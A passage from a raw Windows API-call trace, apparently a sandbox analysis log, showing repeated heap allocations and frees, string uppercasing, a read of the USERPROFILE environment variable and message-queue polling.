Flags=0x0, Size=0x20) returned 0x24b6b20 [0206.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0206.741] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0206.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0206.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0206.742] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0206.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.743] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0206.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0206.745] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0206.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0206.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0206.745] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0206.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0206.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0206.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0206.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0206.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0206.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0206.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.748] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0206.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.748] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0206.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0206.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0206.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.750] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0206.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0206.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0206.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0206.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.753] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 